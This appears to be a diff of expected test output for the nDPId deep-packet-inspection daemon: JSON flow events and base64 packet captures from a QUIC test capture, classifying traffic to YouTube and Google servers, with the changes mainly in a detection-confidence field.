
-00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
+00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495373983,"flow_last_seen":1621495373983,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":56384,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
+00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335381,"flow_last_seen":1621495335381,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":59785,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335383,"flow_last_seen":1621495335383,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":59327,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
+00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495335836,"flow_last_seen":1621495335836,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"39.227.72.32","src_port":63925,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":130,"packets-processed":129,"total-skipped-flows":0,"total-l4-payload-len":174150,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":90,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":90,"total-idle-flows":89,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":405,"global_ts_msec":1621495911385} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02321{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1621495911385,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495911385,"pkt":"AAAAAAAAAAEAS1QMCABFAAViZVRAAH4R9mOokEAFCUGp\/P6iAbsFTuJkwv8AAB0ISXF10ZCPcZ8ANwCrCJzLpozLw4lUkkdlAQ6gxDr15gnzrPDGY+5Es7Rj4OEug7GPyeqPD2P7ep04DtKE\/arcjWhE\/TeK9i4OFMtcnTbxJLT+Ie\/sDxN+8rr9EpWTbrHR6DrOgebE9CnNf9TmE3FgFzE1oavAS0XPwmTIIdH8DlasdxYKazZ2\/Vbz3SE0UaIlbXgmou7suHpa04zHS3u5e9ZyWoFTxGTtw4WSnPz3ZKKkluQDu\/BtGXK0Nw2vkZHZvHI5lbvjogi7BhIgmeQsuujAYnjK\/8JvDzTmbaLJnfI0BPAzgpLAyl5Uc2gG\/KhKxSiYKBAPLQlIw6PFn0Lw49hevbrWvRHOrE9CLjmKoraWxDJ\/mALo4XhOb\/38Fr\/hKdvS3J0EgxlCXTb2thu6vO6TuyRCkuufEdAjYJ1vuqyiJCtFCAuUx7f18Eb4YEnOwiDxAbC3vGkfxkILkOjo6zw0CLRXf8nS\/NGBDwLWigrT+llhvmIHUFzlv9UH+xnKwzw\/egOFElPuDQWAHnu+onEYr+xarKfPXzcUZ2mJ8x2qVU8DnquJVsvWPKVTkAEBNrppoG89a28TVbihC9GQZrxGFJfKiDfU\/pEjYGoEkpc0EmKP6WcJTrq8AjU9GqT8Otws\/2IJyr6eRQmrOEnR61BpA68BS2gZETtHAFeV+7SvjjISU7v1iOrwnLh5PVhV2I3Yg++07Mh3uzcKBBpCykABy4RIzFtFfD0mgpctccbji0EH0ftvDOPuyet7rGzNJxhlJE5822+Xl3TP9GlIFWuu44I+7Awm4hQYyx6SZMm5VkB1u+AQoAVC5yMuqM\/oqccmH3ov\/Y0J8XBnYLvKXGFZN6w2Ie6AwP0RMVPR4KQrpr7QbTjZ1gqRIH\/gSQZm2lG3NnFEcauzrfT+UAJCMrcsBthQQ4GFi4GLid84Wo3e01Yrsz68cR\/Dgyy9EjPbiFW4MTikaH6+JGXf6NLD1CBuUsZVLsd0wLuOp+mdcUObLIIhYByY+ZgC+pokGwX4+0M17gKxSBYArJDBxXe5y9O3GJkG2iDua1ffTw4GMCTWjg\/R2g3bNlRt2Kdpw0gNsexLTtD4vFIhhqYc5yzqubTAWDS97RiK0ff82cdVn+d1axfVYDUVVOuPm8ks3AoXLvMXz0uwOT1I7eZMtFaHeThWMFitpjMx4373HtevJV+R5JNzCQnbUkKMTjHvihPPw5JObhnamIan7J5a0S1j0TBlprZNVWcpdmTBKK9FiCYUebSphRa9ldAHRwzqCWNqZR\/NnSxOGm\/diizPFOGmgelkIA+7xLYtK7TLNkZ6WWwfmMdAfmJXz152dGSsptNpHU7WmssMjos9x0nJPItQNMAxpvgaTkatuyFUAnSEa\/kG2dwBsqrcrwjs\/mFLXB5BDHAaGdSx+C7zjjhFvObf79qhHZ7JrOH0IFeQgRTI\/I\/N1E\/wA3O\/VVPfi5T2WZv1WQoakLe
MywD1DSZddBLRgEj9HiaWe\/6WOpSn\/V\/zM+Gime9loFOdLfGpXUiurZsHPqUL1b6MPeMrtR937yF4HPz5BY+\/tSnZ01u2ik8yu9Q5AJ4CmdPfTqD4sA\/UJgRLpffrp7JIFjyUbElKxtMBDr0WSdiYnf1+TQzqqaiOCpGsNMZoe9ogrQfFW7\/gdsykD2QZJgD7hTY\/mVqzcE88T3Zcf5TxTTDINI4atIY1lYydToKknzxOdKjXEcoGNF2fxUyQPRMk\/YqD0njsh1Dp+iMP\/G3eoOFqy1\/r1bbUJxo+NSb1V8JoUh0VwlVF0mFL"} -00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
+00926{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495911385,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 
00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02321{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1621496172813,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621496172813,"pkt":"AAAAAAAAAAEA4PSECABFAAViwpdAAH4RVxyokEAFXWSX3c7OAbsFTudOyP8AAB0IJfFU5PX57qcAAEU0c0zbXMVn6Pcd4e7ZmfGe\/qxoruMGwPYAlsdY4bBFIJBxlfIjvR+3r8n\/O3U+qJTKKUq8qa0QleuYrfTMsn8O\/y7hixYXl+TzY\/2tPZFmjgWjPy8Q3ousCTGpMjiPdDu1aKCA8puIhbArl8N6Da6NPpGg72zv38j3AEI+JJUvltWracNeEqzqLjSdIseAljbdck9dGPDQn0DHp\/nLF0OQLhgPW7is5GRoEeUyeCGTQitO7sJ+0GFP4Tawvy3HpIB8sQ\/mvWQBI36+Vr0IvUC92N81WsKioT12i3z0lrAFRKc2nrIsK9qzHEDcHRWO8IWXX8n7Ylt6igAVfNRjEBAM2NXSGElvaDPhl5W14nFw2qReuostjw9VWKaXa0YpEemQwzzCdWf\/l2eJ\/wYr+I8wfqvsxZTTgvvVqGvZbvCnJarMpvykClV78Fjr7zdoJH0h6e4wj\/zK66Jl9dPkQ7jrAIn8Djc77n3JalsxT45E5h\/vwJ6Hy1Yu62tVg0onyAEaJRgShAbt65WHHuuOjUbOO7SgM\/l1B3NkYxFQRjbPkOp7\/+btlneTdmAOHcL660GLIGJvYuSg3GxeNY\/RvOuUCpKgbpyQvoy56KwcUUR0q+ZfCEfPOk+4i3eO9doEvGZqOHv6OheClMqNVyw4H6sb5ovkDq\/C4Luz4OZtiQxZAB9o8Z+XJbrSEebIisx\/MMDHqbWhehe1Eg0mRwnSpSkDsUCYcCDmBZZpNGxtE8k+8ji5vCVnS5atqC1q22zlTPttfegwTwCR34A50P0f\/cSq+ZjRg8lUGBiJMY633IK0UkUJK3qD2M+BLuyIwMRCQaYB5FWwQ
ptU0wzlZlcAZTHpnhVpthl5\/8JNWtmRYqhefl5vburajPxYg4gOqVoHDVonhwMZ\/I71i2OZh\/xUUB+2rkwL41c5gUjryBwPqx6xlbPDXfHRijhx6FEeECng0ZOpqAj4GzPzd+hfEZoL+A\/zpIFLSkxIkmdjto2cmeEjcK2ZmzuUECn2TbWRXdwA0raRmtbKwoHqebinUG4Zd73sgqZPzhb6S6fRcJFXth6D1WkWMX\/pmvTBFmwsZtj4vIKhZgtGCFvnCsFQjZwKMGDdk8IcMtc7fRP\/WFw138PAOKXN4\/cwBXBJiHWUsfHmH4IEa3yYTAmTO5bAv3vbyW7AGUPPSZsFuGjThPYUOEo4obqTwpRd+7G7Fj8PTDc9\/SuvOHeEFG8SNmZczyUVz7P\/pwxY9P0pFzlzfGNZ1Yf7NIqIcuZwIAu1QHM8TKxiNpKLXkwY5gWi5EHkWT7ieNOA\/PME3V7yn6j9jdSLAgF1RLKr0bwOhlmrTCeyjtBkecLPxW\/ZpUJSAVdMBzXR4O9Zh2\/3JmabiOVhFtw1hF3o2eH8fM2+XAKwoI8UVoKaXC5im6tL\/RAIV7zKy5boKMeRbQM9fQyx\/xdvgnYYAepCXa5LMPTBjm8XbDITPP1e5aEovXRZlii1OC0w0plqCde8kUQfkZW0LCgurP5FzP2Aui0bpTHOGUVN1ugsbXrtv40HL7weMrKI+pmagU+tsECSDoFrx7+qtDT0YFo235yejWP4S7BEg\/McKYbD5TUBYFtwlDeTjyPkNpblYnvhSMMuhXgVIEl+Jn3adbs96ij4KSAIxF\/p\/twgKC3\/qYYlDHvYQriXuCWK9963IJqD8REoU72BQdfNgjTgbXB0ZOu7ItHmtPuAN9cWJ\/uL2kM5RxQU\/UDcei+A\/uNYyRIl3aPttcTgFoW4dVR1MlFwi\/UvUZjaUxjT"} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients2.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":131,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621496172813,"flow_last_seen":1621496172813,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":52942,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients2.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495911385,"flow_last_seen":1621495911385,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621496172813,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":65186,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 